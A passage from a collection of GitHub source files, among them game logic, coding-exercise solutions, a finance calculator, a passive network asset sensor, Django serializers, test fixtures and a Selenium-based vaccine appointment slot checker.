(Game): Game Object\n source (Card): Source of the life gain\n player (Player): Player that is gaining life\n amountToGain (Int): The amount of life to gain\n\n Returns:\n None\n \"\"\"\n if amountToGain == 0:\n return\n\n player.lifeTotal += amountToGain\n\n game.notifyAll(\"Life Total Update\", {\n \"gameID\": game.gameID,\n \"playerID\": player.playerID,\n \"life\": player.lifeTotal\n })\n\n\ndef setLife(game, source, player, newTotal):\n \"\"\"Sets the life total of the selected player to the specified amount\n\n Args:\n game (Game): Game Object\n source (Object): Source that is setting the player's life total\n player (Player): Player is having their life total set\n newTotal (Int): New life total\n\n Returns:\n None\n \"\"\"\n if player.getLife() == newTotal:\n pass\n elif (player.getLife() > newTotal):\n evaluate(game, loseLife, source=source, player=player, amountToLose=(player.getLife() - newTotal))\n else:\n evaluate(game, gainLife, source=source, player=player, amountToGain=(newTotal - player.getLife()))\n","repo_name":"0xBC9/Cardname-Server","sub_path":"engine/actions/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71153841325","text":"def plastic_balance(lst):\n on = True\n while on:\n if len(lst) == 1:\n if lst[0] + lst[0] != 0:\n return []\n else: \n return lst\n if lst == []:\n return []\n if lst[0] + lst[-1] != sum(lst[1:-1]):\n del lst[0]\n del lst[-1]\n continue\n if lst[0] + lst[-1] == sum(lst[1:-1]):\n return lst\n \n\n\nprint(plastic_balance([0,104,3,101,0,111]))","repo_name":"DovydasMen/codewars","sub_path":"plastci_balance.py","file_name":"plastci_balance.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37194912727","text":"#BOJ 1978 - 소수 찾기\n\nimport sys\nfrom collections import deque\nimport math\ninput = sys.stdin.readline\n\nT = int(input())\narr = list(map(int, input().split()))\ncnt = 0\n\ndef prime(_n):\n if _n < 2:\n return False\n for i in range(2, int(math.sqrt(_n))+1):\n if _n % i == 0:\n return False\n return True\n\nfor i in range(T):\n if prime(arr[i]):\n cnt += 1\n\nprint(cnt)\n","repo_name":"underflow101/BOJ_solve","sub_path":"1978 - 소수 찾기/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44330097553","text":"# importing libraries\nimport streamlit as st\nimport datetime\nimport pandas_datareader.data as web\nimport yfinance as yf\nimport pandas as pd\nimport capm_functions\nimport numpy as np\nimport plotly.express as px\n\n# setting page config\nst.set_page_config(\n\n page_title=\"CAPM\",\n page_icon=\"chart_with_upwards_trend\",\n layout=\"wide\",\n )\n\nst.title('Calculate Beta and Return for individual stock')\n\n# getting input from user\ncol1, col2 = st.columns([1,1])\nwith col1:\n stock = st.selectbox(\"Choose a stock\" , ('TSLA', 'AAPL','NFLX','MGM','MSFT','AMZN','NVDA','GOOGL'))\nwith col2:\n year = st.number_input(\"Number of Years\",1,10)\n\n# downloading data for SP500\nend = datetime.date.today()\nstart = datetime.date(datetime.date.today().year - year, datetime.date.today().month, datetime.date.today().day)\nSP500 = web.DataReader(['sp500'], 'fred', start, end)\n\n# downloading data for the stock\nstocks_df = yf.download(stock, period = f'{year}y')\nstocks_df = stocks_df[['Close']]\nstocks_df.columns = [f'{stock}']\nstocks_df.reset_index(inplace = True)\nSP500.reset_index(inplace = True)\nSP500.columns = ['Date','sp500']\nstocks_df['Date'] = stocks_df['Date'].astype('datetime64[ns]')\nstocks_df['Date'] = stocks_df['Date'].apply(lambda x:str(x)[:10])\nstocks_df['Date'] = pd.to_datetime(stocks_df['Date'])\nstocks_df = pd.merge(stocks_df, SP500, on = 'Date', how = 'inner')\n\n# calculating daily return \nstocks_daily_return = capm_functions.daily_return(stocks_df)\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate beta and alpha\nbeta, alpha = capm_functions.calculate_beta(stocks_daily_return, stock)\n\n# risk free rate of return\nrf = 0\n\n# market potfolio return\nrm = stocks_daily_return['sp500'].mean()*252\n\n# calculate return\nreturn_value = round(rf+(beta*(rm-rf)),2)\n\n# showing results\nst.markdown(f'### Beta : {beta}')\nst.markdown(f'### Return : {return_value}')\nfig = px.scatter(stocks_daily_return, x = 'sp500', y = stock, title = stock)\nfig.add_scatter(x = stocks_daily_return['sp500'], y = beta*stocks_daily_return['sp500'] + alpha, line=dict(color=\"crimson\"))\nst.plotly_chart(fig, use_container_width=True)","repo_name":"mdaamir6870/Capital-Asset-Pricing-Model","sub_path":"pages/Calculate_Beta.py","file_name":"Calculate_Beta.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3404031271","text":"#-*- coding:utf-8 -*-\n\nfrom lib._http_tcp_shark import tcp_http_shark\nfrom lib._http_tcp_pcap import tcp_http_pcap\nfrom lib._util import check_lock\nfrom lib._util import _syslog_msg_send, _http_msg_send, _tcp_msg_send\nimport getopt\nimport sys\nimport os\nimport threading\n# import queue\nimport collections\nimport signal\nimport traceback\nimport time\n\n# 数据接收服务器地址和端口信息\nserver_ip = '127.0.0.1'\nserver_port = 514\n# 监听网卡\ninterface = 'eth0'\n# 主机标识\ncustom_tag = '127.0.0.1'\n# bpf_filter\nbpf_filter = 'tcp'\n# display_filter\ndisplay_filter = 'tcp'\n# debug模式,数据console输出\ndebug = False\n# chunked/gzip数据分析,对性能压力较大\nreturn_deep_info = False\n# 重复缓存数量\ncache_size = 4096\n# 流量会话数量\nsession_size = 4096\n# tshark定期清空内存(单位秒/默认一小时),pcap接收数据包的超时时间(单位毫秒/默认3.6秒)\ntimeout = 3600\n# 发送数据线程数量\nmsg_send_thread_num = 2\n# 发送数据队列最大值\nmax_queue_size = 50000\n# 资产数据发送模式,仅支持TCP,HTTP,SYSLOG三种\nmsg_send_mode = 'TCP'\n# 流量采集引擎,仅支持TSHARK,PCAP两种\nengine = \"PCAP\"\n# pcap采集数据类型控制,TCP,HTTP\npcap_collection_data = 'TCP/HTTP'\n\n# HTTP数据过滤\nhttp_filter = {\n\t\"response_code\": ['304', '400', '404'],\n\t\"content_type\": [\n\t\t'audio/',\n\t\t'video/',\n\t\t'image/',\n\t\t'font/',\n\t\t'application/pdf',\n\t\t'application/msword',\n\t\t'application/javascript',\n\t\t'text/javascript',\n\t\t'text/css'\n\t]\n}\n\ndef Usage():\n\tprint('''\n ###################################################################\n # passets-sensor 1.0.0 #\n ###################################################################\n -------------------------------------------------------------------\n Usage:\n python3 main.py [options] ...\n\n -i Name or idx of interface(def: None)\t\t \n -s server ip(def: None)\n -p server port(def: None)\n -t Source identification(def: localhost)\n -c Cache size(def: 1024)\n -S Session size(def: 1024)\n -T Memory clear time(def: 3600 sec)\n -d Debug information switch(def: off)\n -------------------------------------------------------------------\n\t''')\n\tsys.exit()\n\ndef tshark_analysis(work_queue):\n\n\tshark_obj = tcp_http_shark(work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tshark_obj.run()\n\ndef pcap_analysis(work_queue):\n\tpcap_obj = tcp_http_pcap(pcap_collection_data, int(max_queue_size), work_queue, interface, custom_tag, return_deep_info, http_filter, cache_size, session_size, bpf_filter, timeout, debug)\n\tpcap_obj.run()\n\nclass thread_msg_send(threading.Thread):\n\tdef __init__(self, work_queue, msg_send_mode):\n\n\t\tthreading.Thread.__init__(self)\n\t\tself.work_queue = work_queue\n\t\tself.msg_send_mode = msg_send_mode\n\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\n\tdef msg_obj_fun(self, msg_send_mode):\n\t\tif msg_send_mode == \"TCP\":\n\t\t\tmsg_obj = _tcp_msg_send(server_ip,server_port)\n\t\telif msg_send_mode == \"HTTP\":\n\t\t\thttp_url = \"http://{}:{}/\".format(server_ip,server_port)\n\t\t\tmsg_obj = _http_msg_send(http_url)\n\t\telif msg_send_mode == \"SYSLOG\":\n\t\t\tmsg_obj = _syslog_msg_send(server_ip,server_port)\n\t\telse:\n\t\t\tmsg_obj = ''\n\t\treturn msg_obj\n\n\tdef run(self):\n\t\ttcp_flag = True if self.msg_obj else False\n\t\t# total_msg_num = 0\n\t\twhile True:\n\t\t\t# start = time.time()\n\t\t\tif not tcp_flag:\n\t\t\t\tself.msg_obj = self.msg_obj_fun(self.msg_send_mode)\n\t\t\tif len(self.work_queue):\n\t\t\t\tresult = self.work_queue.popleft()\n\t\t\t\tif msg_send_mode == \"TCP\":\n\t\t\t\t\ttcp_flag = self.msg_obj.info(result)\n\t\t\t\t\t# total_msg_num += 1\n\t\t\t\t\t# if total_msg_num%100 == 0:\n\t\t\t\t\t\t# end = time.time()\n\t\t\t\t\t\t# print(\"Used Time: %s\"%(end - start))\n\t\t\t\telse:\n\t\t\t\t\tself.msg_obj.info(result)\n\n\t\nif __name__ == '__main__':\n\n\t# 宿主机crontab方式启动\n\t# */5 * * * * root /usr/bin/python3 /passets-sensor/main.py >> /dev/null 2>&1\n\t# check_lock()\n\n\ttry:\n\t\topts,args = getopt.getopt(sys.argv[1:],'i: s: p: d: t: r: c: T: S:')\n\texcept:\n\t\tUsage()\n\tif len(opts) < 3:\n\t\tUsage()\n\n\tfor o, a in opts:\n\t\tif o == \"-i\":\n\t\t\tinterface = str(a)\n\t\tif o == '-s':\n\t\t\tserver_ip = str(a)\n\t\tif o == '-t':\n\t\t\tcustom_tag = str(a)\n\t\tif o == '-p': \n\t\t\tserver_port = int(a)\n\t\tif o == '-d':\n\t\t\tdebug_str = str(a)\n\t\t\tif debug_str == 'on':\n\t\t\t\tdebug = True\n\t\tif o == '-r':\n\t\t\treturn_switch_str = str(a)\n\t\t\tif return_switch_str == 'on':\n\t\t\t\treturn_deep_info = True\n\t\t\telse:\n\t\t\t\treturn_deep_info = False\n\t\tif o == '-c':\n\t\t\tcache_size = int(a)\n\t\tif o == '-S':\n\t\t\tsession_size = int(a)\n\t\t\tif session_size == 0:\n\t\t\t\tsession_size = 1024\n\t\tif o == '-T':\n\t\t\ttimeout = int(a)\n\n\tif interface and server_ip and server_port:\n\t\t# 接受通过环境变量传入的过滤设置\n\t\tif 'http_filter_code' in os.environ:\n\t\t\thttp_filter['response_code'] = list(set(filter(None, os.environ[\"http_filter_code\"].replace(\" \",\"\").split(\",\"))))\n\t\tif 'http_filter_type' in os.environ:\n\t\t\thttp_filter['content_type'] = list(set(filter(None, os.environ[\"http_filter_type\"].replace(\" \",\"\").split(\",\"))))\n\t\tbpf_filter += ' and not (host {} and port {}) and not (host 127.0.0.1 or host localhost) '.format(server_ip,server_port)\n\n\t\ttry:\n\t\t\t# work_queue = queue.LifoQueue(max_queue_size)\n\t\t\twork_queue = collections.deque(maxlen=int(max_queue_size))\n\t\t\t\n\t\t\tfor i in range(msg_send_thread_num):\n\t\t\t\tmsg_thread_obj = thread_msg_send(work_queue, msg_send_mode)\n\t\t\t\tmsg_thread_obj.setDaemon(True)\n\t\t\t\tmsg_thread_obj.start()\n\n\t\t\tif engine == 'PCAP':\n\t\t\t\tpcap_analysis(work_queue)\n\t\t\telif engine == 'TSHARK':\n\t\t\t\ttshark_analysis(work_queue)\n\n\t\texcept KeyboardInterrupt:\n\t\t\tprint('\\nExit.')\n\t\t\tos.kill(os.getpid(),signal.SIGKILL)\n\t\texcept :\n\t\t\ttraceback.print_exc()\n\telse:\n\t\tUsage()","repo_name":"DSO-Lab/passets-sensor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"12679565618","text":"from dj_rest_auth.registration.serializers import RegisterSerializer\nfrom dj_rest_auth.serializers import LoginSerializer\nfrom django.contrib.auth import get_user_model, models\nfrom drf_extra_fields.fields import Base64ImageField\nfrom drf_spectacular.utils import extend_schema_field\nfrom rest_framework import serializers\n\nfrom admin.utils import get_timestamp_path\nfrom users.models import CustomUser, Contact\n\n\nclass AuthLoginSerializer(LoginSerializer):\n username = None\n\n\nclass CustomRegisterSerializer(RegisterSerializer):\n username = None\n first_name = serializers.CharField(required=True, write_only=True)\n last_name = serializers.CharField(required=True, write_only=True)\n email = serializers.EmailField(required=True)\n password1 = serializers.CharField(required=True, write_only=True)\n password2 = serializers.CharField(required=True, write_only=True)\n is_builder = serializers.BooleanField(required=True)\n\n def custom_signup(self, request, user):\n user.is_builder = self.validated_data.get('is_builder', user.is_builder)\n user.save(update_fields=['is_builder'])\n\n def get_cleaned_data(self):\n return {\n 'first_name': self.validated_data.get('first_name', ''),\n 'last_name': self.validated_data.get('last_name', ''),\n 'password1': self.validated_data.get('password1', ''),\n 'email': self.validated_data.get('email', ''),\n 'is_builder': self.validated_data.get('is_builder', '')\n }\n\n\nclass ContactSerializer(serializers.ModelSerializer):\n class Meta:\n model = Contact\n fields = ['id', 'first_name', 'last_name', 'phone', 'email']\n read_only_fields = ['id']\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n agent_contacts = ContactSerializer()\n avatar = Base64ImageField(required=False)\n\n def update(self, instance, validated_data):\n # Add your custom logic here for updating the instance\n # For example, you can update specific fields of the instance based on the validated_data\n if 'agent_contacts' in validated_data:\n contact = Contact.objects.get(user=instance)\n contact.email = validated_data['agent_contacts'].get('email', contact.email)\n contact.phone = validated_data['agent_contacts'].get('phone', contact.phone)\n contact.first_name = validated_data['agent_contacts'].get('first_name', contact.first_name)\n contact.last_name = validated_data['agent_contacts'].get('last_name', contact.last_name)\n contact.save()\n # You can also perform any additional custom operations\n instance.email = validated_data.get('email', instance.email)\n instance.phone = validated_data.get('phone', instance.phone)\n instance.avatar = validated_data.get('avatar', instance.avatar)\n instance.first_name = validated_data.get('first_name', instance.first_name)\n instance.last_name = validated_data.get('last_name', instance.last_name)\n instance.notification_type = validated_data.get('notification_type', instance.notification_type)\n instance.redirect_notifications_to_agent = validated_data.get('redirect_notifications_to_agent',\n instance.redirect_notifications_to_agent)\n instance.save()\n\n return instance\n\n class Meta:\n model = CustomUser\n fields = [\n 'id',\n 'first_name',\n 'last_name',\n 'phone',\n 'email',\n 'avatar',\n 'is_active',\n 'is_staff',\n 'last_login',\n 'date_joined',\n 'notification_type',\n 'agent_contacts',\n 'redirect_notifications_to_agent',\n ]\n","repo_name":"DanilHushchyn/SwipeAPI","sub_path":"users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70530548842","text":"import numpy as np\n\nclass MyLinearRegression():\n \"\"\"\n Description:\n My personnal linear regression class to fit like a boss.\n \"\"\"\n\n def __init__(self, thetas, alpha=0.001, max_iter=1000):\n if not isinstance(thetas, np.ndarray) or thetas.size == 0:\n return None\n self.alpha = alpha\n self.max_iter = max_iter\n self.thetas = thetas\n\n def DataChecker(func):\n def wrapper(self, *args, **kwargs):\n for item in args:\n if not isinstance(item, np.ndarray)\\\n or not np.issubdtype(item.dtype, np.number):\n return None\n res = func(self, *args, **kwargs)\n return res\n return wrapper\n\n @DataChecker\n def fit_(self, x, y):\n\n X = np.insert(x, 0, 1, axis=1)\n for _ in range(self.max_iter):\n self.thetas = self.thetas - self.alpha\\\n * (X.T @ ((X @ self.thetas) - y)) / y.shape[0]\n\n return self.thetas\n\n @DataChecker\n def predict_(self, x):\n\n x = x.reshape(-1, 1) if len(x.shape) < 2 else x\n X = np.insert(x, 0, 1, axis=1)\n\n theta = self.thetas.reshape(-1, 1) if len(self.thetas.shape) < 2 else self.thetas\n\n if X.shape[1] != theta.shape[0] and theta.shape != (2, 1):\n return None\n\n return X @ theta\n\n @DataChecker\n def loss_elem_(self, y, y_hat):\n\n return (y - y_hat)**2\n\n @DataChecker\n def loss_(self, y, y_hat):\n\n return float(sum((y - y_hat)**2)/(2 * y.shape[0]))\n\n @staticmethod\n def mse_(y, y_hat):\n\n return float(sum((y - y_hat)**2)/(y.shape[0]))\n\nif __name__ == '__main__':\n import math\n import numpy as np\n from my_linear_regression import MyLinearRegression as MyLR\n x = np.array([[12.4956442], [21.5007972], [31.5527382], [48.9145838], [57.5088733]])\n y = np.array([[37.4013816], [36.1473236], [45.7655287], [46.6793434], [59.5585554]])\n lr1 = MyLR(np.array([[2], [0.7]]))\n\n # Example 0.0:\n y_hat = lr1.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[10.74695094],\n ## [17.05055804],\n ## [24.08691674],\n ## [36.24020866],\n ## [42.25621131]])\n\n # Example 0.1:\n print(lr1.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[710.45867381],\n ## [364.68645485],\n ## [469.96221651],\n ## [108.97553412],\n ## [299.37111101]])\n\n # Example 0.2:\n print(lr1.loss_(y, y_hat), '\\n')\n # Output:\n ## 195.34539903032385\n\n # Example 1.0:\n lr2 = MyLR(np.array([[1], [1]]), 5e-8, 1500000)\n lr2.fit_(x, y)\n print(lr2.thetas, '\\n')\n # Output:\n #array([[1.40709365],\n #[1.1150909 ]])\n\n # Example 1.1:\n y_hat = lr2.predict_(x)\n print(y_hat, '\\n')\n # Output:\n ## array([[15.3408728 ],\n ## [25.38243697],\n ## [36.59126492],\n ## [55.95130097],\n ## [65.53471499]])\n\n # Example 1.2:\n print(lr2.loss_elem_(y, y_hat), '\\n')\n # Output:\n ## array([[486.66604863],\n ## [115.88278416],\n ## [ 84.16711596],\n ## [ 85.96919719],\n ## [ 35.71448348]])\n\n # Example 1.3:\n print(lr2.loss_(y, y_hat), '\\n')\n # Output:\n ## 80.83996294128525\n","repo_name":"BenElhadj/42-Piscine-ML","sub_path":"ML01/ex03/my_linear_regression.py","file_name":"my_linear_regression.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39885873059","text":"# -*- coding: utf-8 -*-\nfrom gluon import *\n\n\ndef Fase_Table(db, T):\n db.define_table('Fase',\n Field('numero', 'integer',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un numero de identificacion')],\n label='Numero'),\n Field('plan_trabajo', 'reference Plan_Trabajo',\n label='Pasantía (*)',\n writable=False),\n Field('objetivo_especifico', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario un objetivo')],\n label='Objetivo Específico'),\n Field('descripcion', 'text',\n requires=[IS_NOT_EMPTY\n (error_message='Es necesario una Descripcion')],\n label='Descripción'),\n format=lambda r: '%s - %s' % (r.numero, r.objetivo_especifico)\n )\n","repo_name":"cadena-si-usb/SPE","sub_path":"applications/SPE_lib/modules/db_6_Fase.py","file_name":"db_6_Fase.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70334218604","text":"# 官方文档https://learning-pytest.readthedocs.io/zh/latest/doc/fixture/intro.html\n\nimport pytest\n\n'''\n@pytest.fixture(scope='session', autouse=True)\ndef fixture_session():\n print('\\n测试所有用例开始session####################')\n yield\n print('\\n测试所有用例结束session####################')\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef fixture_function():\n print('\\n function每个测试用例开始####################')\n yield\n print('\\n function每个测试用例结束####################')\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef fixture_module():\n print('\\n 每个模块测试用例开始module===================>')\n yield\n print('\\n 每个模块测试用例结束module===================>')\n\n\n@pytest.fixture(scope='class', autouse=True)\ndef fixture_class():\n print('\\n 每个模块测试用例开始class===================>')\n yield\n print('\\n 每个模块测试用例结束class===================>')\n\n\n'''\n\n@pytest.fixture(scope='session', name='lg')\ndef login_and_loginout():\n print(\"\\n登录xxxxxx,获取token...\")\n token = '9999999'\n yield token\n print('\\n退出登录####################')\n\n\n\n","repo_name":"loomz/testcase_time_geek","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13798745406","text":"import time\nimport urllib.parse\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nimport requests\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport os\n\nfrom checker.common.report_object import ReportObject\nfrom checker.common.setup_logger import logger\nfrom checker.common.session_object import SessionObject\nfrom checker.common.twilio_notifier import TwilioNotifier\n\nfrom dotenv import load_dotenv\n\nfrom checker.exception.login_exception import LoginExpiredException\nfrom checker.exception.token_exception import TokenExpiredException\n\nload_dotenv()\n\nclass KaiserNorCal:\n\n LOGIN_REQUEST = 'https://mydoctor.kaiserpermanente.org/ncal/appointments/#/selectFacility/covid19-vaccination/dose1-evisit'\n FACILITIES_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_REQUEST = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/covid_dose1_evisit/facilities'\n SLOT_DELETE = 'https://mydoctor.kaiserpermanente.org/mdo/api/v2/appointments/slot-locks'\n\n def __init__(self):\n self.name = \"Kaiser Northern California\"\n self.session = SessionObject()\n self.facilities = []\n\n ##-------------------------------\n ## EXECUTE\n ##-------------------------------\n\n def execute(self):\n start = time.perf_counter()\n\n report = ReportObject()\n report.strategy = self.name\n\n #build the session here\n if not self.session.is_active():\n #if login is expired, we should probbaly build both\n if not self.session.is_login_active():\n logger.info('building full session...')\n if self.do_login(True):\n self.get_facilities()\n else:\n logger.warning('unable to build login')\n if not self.session.is_token_active():\n logger.info('refreshing token...')\n self.get_facilities()\n\n #start processing - at this point we hopefully have a valid session\n if self.session.is_active():\n logger.info('making requests...')\n for facility in self.facilities:\n status = self.check_slots_by_facility(facility)\n report.add_facility(facility, status)\n else:\n logger.warning('session was not active, something happened')\n\n end = time.perf_counter()\n\n report.duration=end-start\n logger.info(report.to_string())\n\n return report\n\n ##-------------------------------\n\n def check_slots_by_facility(self, facility_code):\n logger.debug('checking for slots in facility '+ facility_code)\n #hit facility\n status = self.request_slots(facility_code)\n\n #if there is a slot - open browser, force cookies\n if status==1:\n self.get_appointment()\n else:\n #delete the appointment\n self.delete_appointment()\n\n return status\n\n ##-------------------------------\n ## HELPER METHODS\n ##-------------------------------\n\n def do_login(self, is_headless):\n login_u = os.getenv('KAISER_LOGIN')\n login_p = os.getenv('KAISER_PASSWORD')\n browser_path = os.getenv('PATH_TO_FIREFOX_DRIVER')\n\n #set the time when i rebuild this\n self.created_at=time.time()\n self.session.set_login(login_u)\n\n opts = Options()\n opts.headless = is_headless\n browser = Firefox(options=opts, executable_path=browser_path)\n browser.get(self.LOGIN_REQUEST)\n\n login_username_field = browser.find_element_by_id('username')\n login_username_field.send_keys(login_u)\n login_password_field = browser.find_element_by_id('password')\n login_password_field.send_keys(login_p)\n\n login_submit = browser.find_element_by_id('sign-on')\n login_submit.submit()\n\n # need the browser to load the my doctor online page\n delay = 5\n try:\n WebDriverWait(browser, delay).until(EC.presence_of_element_located((By.ID, 'member-select-id')))\n logger.debug('Page loaded.')\n except TimeoutException:\n logger.warning('Loading took too long...')\n return False\n\n self.session.set_cookies_raw(browser.get_cookies())\n logger.debug(f\"COOKIE: {self.session.cookies}\")\n\n if is_headless:\n browser.close()\n\n #TODO: need to create a condition where the login doesnt work\n\n return True\n\n ##-------------------------------\n\n def get_facilities(self):\n logger.debug('getting facility list and token...')\n\n headers = {'Cookie': self.session.cookies}\n\n try:\n response = requests.get(self.FACILITIES_REQUEST, headers=headers)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n #most likely login is out of date\n raise LoginExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n\n if 'token' in t:\n token = t['token']\n logger.debug(f\"TOKEN: {token}\")\n self.session.set_token(token)\n\n return t\n else:\n logger.warning('Response for facilities was empty')\n\n return None\n\n\n ##-------------------------------\n\n def request_slots(self, facility):\n logger.debug('requesting slots for '+ facility)\n\n sd = time.strftime('%d/%m/%Y')\n sd_str = urllib.parse.quote_plus(sd)\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n params['showFirstAvailable'] = 'true'\n params['startDate'] = sd_str\n params['bookingGuideline'] = 'COVIDVACCINE'\n\n uri = f\"{self.SLOT_REQUEST}/{facility}/slot-locks\"\n headers = {'Cookie': self.session.cookies, 'Content-Type': 'application/json'}\n\n try:\n response = requests.post(uri, headers=headers, params=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n # most likely login is out of date\n raise TokenExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n if not t['slots']:\n logger.info(f\"No slots available at: {facility}\")\n return 0\n else:\n logger.info(t)\n\n appointmentList = []\n for sl in t['slots']:\n appt = f\"* {sl['facilityName']} at {sl['appointmentDate']} {sl['appointmentTime']}\"\n appointmentList.append(appt)\n\n logger.info(f\"SLOTS AVAILABLE: {facility}\")\n TwilioNotifier.send_notification(f\"Vaccine slot(s) at {facility} - {'|'.join(appointmentList)}\")\n return len(appointmentList)\n\n logger.warning(f\"Response for slots at {facility} was empty\")\n return -1\n\n ##-------------------------------\n\n def delete_appointment(self):\n logger.debug('cleaning up appointments related to token...')\n\n headers = {'Cookie': self.session.cookies}\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n\n try:\n response = requests.delete(self.SLOT_DELETE, headers=headers, params=params)\n except requests.exceptions.HTTPError as errh:\n logger.error(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n\n ##-------------------------------\n\n def get_appointment(self):\n self.do_login(False)\n self.delete_appointment()","repo_name":"macgngsta/python-product-checker","sub_path":"checker/strategy/kaiser_norcal_strategy.py","file_name":"kaiser_norcal_strategy.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"18864913870","text":"def isBodyValid(body):\r\n valid = 0\r\n if len(body) == 3:\r\n valid += 1\r\n keyList = ['id', 'player', 'position']\r\n subkeyList = ['x','y']\r\n if all(key in body for key in keyList):\r\n valid += 1\r\n if all(subkey in body['position'] for subkey in subkeyList):\r\n valid += 1\r\n if body['position']['x']<3 and body['position']['x']>=0:\r\n valid += 1\r\n if body['position']['y']<3 and body['position']['y']>=0:\r\n valid += 1\r\n if valid == 5:\r\n return True\r\n else:\r\n return False","repo_name":"ftcRibeiro/jogoDaVelha","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24429859531","text":"name = \"qualityCheck\"\n\nversion = \"0.0.0\"\n\nauthors = [\"ArtFx TD gang\"]\n\ndescription = \\\n \"\"\"\n Python maya Packages.\n Use to converse with Maya dcc\n \"\"\"\n\nrequires = [\n \"python\",\n \"checkLib\",\n \"PySide2\",\n \"shiboken2\"\n]\nvcs = \"git\"\n\n\ndef commands():\n global env\n env.PATH.append(\"{root}/lib\")\n env.PYTHONPATH.append(\"{root}/lib\")\n\n\ntests = {\n \"unit\": \"python -m unittest discover -s {root}/tests\",\n \"lint\": {\n \"command\": \"pylint scripts\",\n \"requires\": [\"pylint\"],\n \"run_on\": [\"default\", \"pre_release\"]\n },\n \"maya\": {\n \"command\": \"mayapy {root}/tests/qualitycheck_test.py\",\n \"requires\": [\"maya\"],\n \"run_on\": \"explicit\"\n },\n}\n","repo_name":"Soulayrol/Pipeline","sub_path":"packages/artfx/qualityCheck/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6244569144","text":"from multiprocessing import Pool, cpu_count\nimport numpy as np\nimport os, imghdr\nfrom shutil import copy\nimport pandas as pd\nfrom time import sleep\nfrom scipy.spatial import distance_matrix\nfrom PyQt5 import QtCore\n\nimport CHUBACAPP.utils.pyvista_utils as pv_utils\nimport CHUBACAPP.utils.sfm as sfm\nimport CHUBACAPP.post_reprojection.permutator as pm\nimport CHUBACAPP.blender.blender_reprojection as brp\nimport CHUBACAPP.utils.export_annotations as exp_tools\n\n\nclass DISThread(QtCore.QThread):\n \"\"\"Detects the blurry image and store their reference for later suppression\"\"\"\n prog_val = QtCore.pyqtSignal(int)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, sfm_path, model_path, camera_model, img_path, method):\n super(DISThread, self).__init__()\n self.running = True\n self.sfm_path = sfm_path\n self.model_path = model_path\n self.camera_model = camera_model\n self.img_path = img_path\n self.method = method\n\n def run(self):\n disjoint_image_selection(self.sfm_path, self.model_path, self.camera_model, self.img_path, self.method, self)\n\n\ndef disjoint_image_selection(sfm_path, model_path, camera_model, img_path, method, thread=None):\n dist_filter 